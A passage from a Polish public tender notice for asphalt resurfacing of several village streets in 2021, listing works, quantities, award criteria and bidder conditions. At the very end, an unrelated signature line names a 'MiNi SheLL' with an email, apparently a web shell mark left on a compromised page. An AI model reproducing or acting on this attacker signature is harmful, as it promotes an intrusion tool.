nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,400 km;<br/>b) wyrównanie istniejącej podbudowy tłuczniem kamiennym na końcowym odcinku drogi 70 m o średniej grubości 5 cm w ilości 14 m3;<br/>c) wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubości 2 cm/m2 w ilości 100,00 t;<br/>d) wykonanie mechanicznego czyszczenia nawierzchni oraz skropienie nawierzchni drogowej asfaltem oraz na wjazdach w ilości 2156 m2;<br/>e) wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej o grubości 5 cm na końcowym odcinku drogi oraz na wjazdach w ilości 506 m2;<br/>f) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 2156 m2;<br/>g) wykonanie korytowania i podbudowy z kruszywa kamiennego o grubości 20 cm na wjazdach w ilości 10 m2;<br/>h) dostosowanie wysokości nawierzchni wraz z krawężnikami istniejących wjazdów do bramy i furtki w ilości 81 m2;<br/>i) regulacja wysokości krawężników przy wjeździe na miejsca postojowe przy boisku sportowym w ilości 70 mb;<br/>j) regulacja pionowa wpustów ulicznych w ilości 2 sztuk;<br/>k) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,50 m po każdej stronie jezdni poza wjazdami w ilości 172 m2;<br/>l) zabudowa krawężników drogowych na wjazdach w ilości 77 mb na podsypce cementowo-piaskowej;<br/>m) oczyszczenie i wyprofilowanie rowów przydrożnych w ilości 172 mb, jednak nie szerzej niż szerokość pasa drogowego.<br/>2) Przebudowa nawierzchni asfaltowej – ulicy Leśnej w Taciszowie. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,330 km;<br/>b) wykonanie korytowania i podbudowy z kruszywa kamiennego na odcinku końcowym ulicy Leśnej 17 mb o szerokości 3 m i grubości 20 cm oraz na 2 wjazdach - razem 60 m2;<br/>c) wykonanie warstwy wiążącej na końcowym odcinku drogi oraz na wjazdach z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 60 m2;<br/>d) wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubości 4 cm/m2 w ilości 93,3 t;<br/>e) wykonanie mechanicznego czyszczenia nawierzchni oraz skropienie nawierzchni drogowej asfaltem w ilości 1049,20 m2;<br/>f) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 1049,20 m2;<br/>g) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 148,2 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>3) Przebudowa nawierzchni asfaltowej ulicy Kościelnej w Ligocie Łabędzkiej. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,180 km;<br/>b) wykonanie korytowania i podbudowy z kruszywa kamiennego na odcinku końcowym ulicy Kościelnej 35 mb o szerokości 3 m i grubości 20 cm oraz na wjazdach - razem 125 m2;<br/>c) wykonanie warstwy wiążącej na całym odcinku drogi oraz na wjazdach z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 604,50 m2;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 604,50 m2;<br/>e) zabezpieczenie wjazdów krawężnikami drogowymi w ilości 51 mb;<br/>f) regulacja zaworów wodociągowych w ilości 5 sztuk;<br/>g) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 77,4 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>4) Przebudowa nawierzchni asfaltowej – bocznej ulicy Gliwickiej w Rudnie. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,290 km;<br/>b) wyrównanie podbudowy z żużla wielkopiecowego na odcinku 132 m o średniej grubości 5 cm w ilości 23,30 m3 oraz wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubości 3 cm/m2 w ilości 37,9 t;<br/>c) wykonanie warstwy wiążącej z mieszanki mineralno-bitumicznej oraz na wjazdach o grubości 5 cm w ilości 472,4 m2 - na odcinku o nawierzchni tłuczniowej;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 983,00 m2;<br/>e) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,30 m po każdej stronie jezdni w ilości 144 m2, jednak nie szerzej niż szerokość pasa drogowego.<br/>5) Przebudowa nawierzchni asfaltowej – odcinka ulicy Rolniczej w Bycinie w rejonie przystanku autobusowego. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,030 km;<br/>b) wykonanie wyrównania podbudowy z kruszywa kamiennego o średniej grubości 5 cm w ilości 4,50 m3;<br/>c) wykonanie warstw wiążącej na całym odcinku drogi z mieszanki mineralno-bitumicznej o grubości 5 cm w ilości 140 m2;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm w ilości 150 m2;<br/>e) zabezpieczenie obrzeży krawężnikami drogowymi w ilości 22 mb, jednak nie szerzej niż szerokość pasa drogowego.<br/>6) Przebudowa nawierzchni asfaltowej – odcinka ulicy Zamkowej w Rudzińcu. Przedmiotem zamówienia są roboty budowlane polegające na przebudowie nawierzchni drogi, a w zakres robót wchodzi m.in.:<br/>a) wykonanie robót pomiarowych w ilości 0,330 km;<br/>b) wyrównanie istniejącej nawierzchni asfaltowej mieszanką mineralno-bitumiczną o średniej grubość 2 cm/m2 w ilości 68,2 t;<br/>c) wykonanie mechanicznego czyszczenia nawierzchni oraz skropienie nawierzchni drogowej asfaltem oraz na wjazdach w ilości 1.419,50 m2;<br/>d) wykonanie warstwy ścieralnej z mieszanki mineralno-bitumicznej o grubości 4 cm oraz na wjazdach w ilości 1.419,50 m2;<br/>e) regulacja pionowa studni kanalizacyjnych w ilości 3 sztuk;<br/>f) wykonanie utwardzenia pobocza drogi żużlem wielkopiecowym o grubości warstwy 10 cm na szerokości 0,50 m po każdej stronie jezdni poza wjazdami w ilości 134 m2, jednak nie szerzej niż szerokość pasa drogowego;<br/>g) oczyszczenie ścieków ulicznych betonowych w ilości 88 mb.<br/>Podstawowe parametry techniczne drogi przedstawiają się następująco:<br/>- klasa techniczna ulicy – D;<br/>- prędkość projektowa – Vp= 50km/h;<br/>- kategoria obciążenia ruchem – KR1;<br/>- szerokość jezdni 3,0 m;<br/>- pochylenie poprzeczne nawierzchni – 2%;<br/>- nawierzchnia drogi – bitumiczna;<br/>- szerokość poboczy – 0,30m – 0,50m;<br/>- pochylenie poprzeczne poboczy – 8%.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w rozdziale 3 SWZ oraz w załączniku nr 1 do SWZ - Dokumentacja techniczna. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">63 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pkres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunek dotyczący zdolności technicznej i zawodowej:<br/>Opis sposobu dokonywania oceny spełniania tego warunku:<br/>w zakresie zadania I:<br/>- Zamawiający uzna za spełniony w/w warunek, jeżeli Wykonawca wykaże, że: w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty oraz zgodnie z zasadami sztuki budowlanej wykonał i prawidłowo ukończył co najmniej jedną robotę budowlaną polegającą na modernizacji, przebudowie lub budowie drogi o wartości co najmniej 300.000,00 zł (trzysta tysięcy złotych 00/100).<br/>w zakresie zadania II:<br/>- Zamawiający uzna za spełniony w/w warunek, jeżeli Wykonawca wykaże, że: w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w sposób należyty oraz zgodnie z zasadami sztuki budowlanej wykonał i prawidłowo ukończył co najmniej jedną robotę budowlaną polegającą na modernizacji, przebudowie lub budowie drogi o wartości co najmniej 150.000,00 zł (sto pięćdziesiąt tysięcy złotych 00/100). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – potwierdzający odpowiednio spełnianie warunku opisanego w rozdz. VI ust. 1 <br/>pkt 4) SWZ – załącznik nr 7 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w rozdziale VIII ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które elementy zamówienia wykonają poszczególni wykonawcy – załącznik nr 8 do SWZ.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, zawarto w projektowanych postanowieniach umowy stanowiących załącznik nr 9 do SWZ.<br/>2. Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, które zostały określone w projektowanych postanowieniach umowy stanowiących załącznik nr 9 do SWZ.<br/>3. Wykonawcy nie przysługuje roszczenie o wprowadzenie zmian.<br/>4. Wszelkie zmiany i uzupełnienia do umowy wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu, za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-29</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com